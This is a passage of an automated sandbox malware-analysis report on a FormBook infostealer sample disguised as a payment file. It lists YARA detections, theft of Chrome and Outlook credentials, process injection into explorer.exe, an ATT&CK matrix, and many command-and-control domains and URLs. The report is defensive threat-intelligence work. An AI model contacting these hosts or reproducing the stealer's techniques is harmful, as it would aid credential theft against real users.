          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.777751246.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.266462070.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: GetLocaleInfoA,1_2_00C59E63
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: GetLocaleInfoA,2_2_00C59E63
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56278 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00C56278
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Rundll32          		Proc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830322 Sample: OUTSTANDING_PAYMENT.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 33 Snort IDS alert for network traffic 2->33 35 Multi AV Scanner detection for domain / URL 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 6 other signatures 2->39 9 OUTSTANDING_PAYMENT.exe 19 2->9         started        process3 file4 25 C:\Users\user\AppData\Local\Temp\qhcqh.exe, PE32 9->25 dropped 12 qhcqh.exe 9->12         started        process5 signatures6 51 Multi AV Scanner detection for dropped file 12->51 53 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->53 55 Maps a DLL or memory area into another process 12->55 15 qhcqh.exe 12->15         started        process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 3 6 15->18 injected process9 dnsIp10 27 www.mynichemarket.co.uk 185.151.30.181, 49709, 49710, 49711 TWENTYIGB United Kingdom 18->27 29 www.landlotto.ru 109.70.26.37, 49712, 49713, 49714 RU-CENTERRU Russian Federation 18->29 31 18 other IPs or domains 18->31 41 System process connects to network (likely due to code injection or exploit) 18->41 22 rundll32.exe 13 18->22         started        signatures11 process12 signatures13 43 Tries to steal Mail credentials (via file / registry access) 22->43 45 Tries to harvest and steal browser information (history, passwords, etc) 22->45 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          OUTSTANDING_PAYMENT.exe72%ReversingLabsWin32.Trojan.Leonem
          OUTSTANDING_PAYMENT.exe72%VirustotalBrowse
          OUTSTANDING_PAYMENT.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\qhcqh.exe51%ReversingLabsWin32.Trojan.Tnega

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.rundll32.exe.4f53814.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.qhcqh.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.qhcqh.exe.980000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.rundll32.exe.30544f8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          dirdikyepedia.com9%VirustotalBrowse
          allison2patrick.online6%VirustotalBrowse
          www.gorwly.top3%VirustotalBrowse
          glb-mobility.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.hudsonandbailey.uk0%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.karlscurry.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==100%Avira URL Cloudmalware
          http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==100%Avira URL Cloudmalware
          http://www.thelastwill.net/0oqq/0%Avira URL Cloudsafe
          http://www.mynichemarket.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.glb-mobility.com0%Avira URL Cloudsafe
          http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.brennmansoluciones.com0%Avira URL Cloudsafe
          http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.allison2patrick.online/0oqq/100%Avira URL Cloudmalware
          http://www.karlscurry.co.uk0%Avira URL Cloudsafe
          http://www.glb-mobility.com/0oqq/0%Avira URL Cloudsafe
          http://www.g2fm.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.thelastwill.net0%Avira URL Cloudsafe
          http://www.sexopornoxx.store/0oqq/100%Avira URL Cloudmalware
          http://www.thebang.sbs0%Avira URL Cloudsafe
          http://www.ty23vip.com/0oqq/0%Avira URL Cloudsafe
          http://www.fanversewallet.com/0oqq/100%Avira URL Cloudmalware
          http://www.ketoibabal.cyou/0oqq/0%Avira URL Cloudsafe
          http://www.ty23vip.com0%Avira URL Cloudsafe
          http://www.landlotto.ru/0oqq/100%Avira URL Cloudmalware
          https://tiao2022.vip:12306/?u=0%Avira URL Cloudsafe
          http://www.gorwly.top100%Avira URL Cloudmalware
          http://www.mynichemarket.co.uk0%Avira URL Cloudsafe
          http://www.dirdikyepedia.com/0oqq/100%Avira URL Cloudmalware
          http://www.themssterofssuepnse.rest100%Avira URL Cloudmalware
          http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.fanversewallet.com100%Avira URL Cloudmalware
          http://www.allison2patrick.online0%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.leewanyam.com/0oqq/poIb=tYchV80%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/0%Avira URL Cloudsafe
          http://www.gorwly.top/0oqq/100%Avira URL Cloudmalware
          http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.brennmansoluciones.com/0oqq/poIb=tYchV80%Avira URL Cloudsafe
          http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA==0%Avira URL Cloudsafe
          http://www.leewanyam.com/0oqq/0%Avira URL Cloudsafe
          https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe
          https://fasthosts.co.uk/0%Avira URL Cloudsafe
          http://www.themssterofssuepnse.rest/0oqq/100%Avira URL Cloudmalware
          http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.ketoibabal.cyou0%Avira URL Cloudsafe
          https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_0%Avira URL Cloudsafe
          http://www.virginhairweave.co.uk/0oqq/0%Avira URL Cloudsafe
          http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8100%Avira URL Cloudmalware
          http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d20%Avira URL Cloudsafe
          http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.virginhairweave.co.uk0%Avira URL Cloudsafe
          http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA==0%Avira URL Cloudsafe
          http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==100%Avira URL Cloudmalware
          http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2100%Avira URL Cloudmalware
          http://www.g2fm.co.uk0%Avira URL Cloudsafe
          http://www.landlotto.ru100%Avira URL Cloudmalware
          http://www.hudsonandbailey.uk/0oqq/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dirdikyepedia.com
          		5.181.216.141
          		truetrueunknown
          allison2patrick.online
          		62.4.21.190
          		truetrueunknown
          www.gorwly.top
          		192.64.116.162
          		truetrueunknown
          glb-mobility.com
          		88.99.217.197
          		truetrueunknown
          www.hudsonandbailey.uk
          		199.59.243.223
          		truetrue
            		unknown
            www.virginhairweave.co.uk
            		198.58.118.167
            		truetrue
              		unknown
              www.g2fm.co.uk
              		213.171.195.105
              		truetrue
                		unknown
                www.landlotto.ru
                		109.70.26.37
                		truetrue
                  		unknown
                  www.karlscurry.co.uk
                  		217.160.0.249
                  		truetrue
                    		unknown
                    www.ty23vip.com
                    		162.209.159.142
                    		truetrue
                      		unknown
                      fanversewallet.com
                      		203.245.24.47
                      		truetrue
                        		unknown
                        www.mynichemarket.co.uk
                        		185.151.30.181
                        		truetrue
                          		unknown
                          www.themssterofssuepnse.rest
                          		unknown
                          		unknowntrue
                            		unknown
                            www.glb-mobility.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.fanversewallet.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ketoibabal.cyou
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.allison2patrick.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.brennmansoluciones.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.dirdikyepedia.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.thelastwill.net
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.karlscurry.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mynichemarket.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.allison2patrick.online/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.glb-mobility.com/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.g2fm.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fanversewallet.com/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.landlotto.ru/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.dirdikyepedia.com/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.gorwly.top/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.virginhairweave.co.uk/0oqq/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.hudsonandbailey.uk/0oqq/true
                                          • Avira URL Cloud: malware
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                            		high
                                            https://www.nic.ru/catalog/mail/on-domain/?ipartner=6666&adv_id=click_mail&utm_source=stpg_all&utm_mrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=81EFaKSJ3.13.drfalse
                                                		high
                                                http://www.ty23vip.com/0oqq/explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.ketoibabal.cyou/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.nic.ru/catalog/ssl/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.nic.ru/catalog/sites/sitebuilder/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.nic.ru/catalog/domains/ru/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://nic.ru/images/w8/win8transp.pngrundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.hudsonandbailey.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.glb-mobility.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.comrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.00000000054A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://nic.ru/rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.nic.ru/catalog/domains/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.thelastwill.net/0oqq/explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_alrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrundll32.exe, 0000000D.00000002.781120791.0000000005FA6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
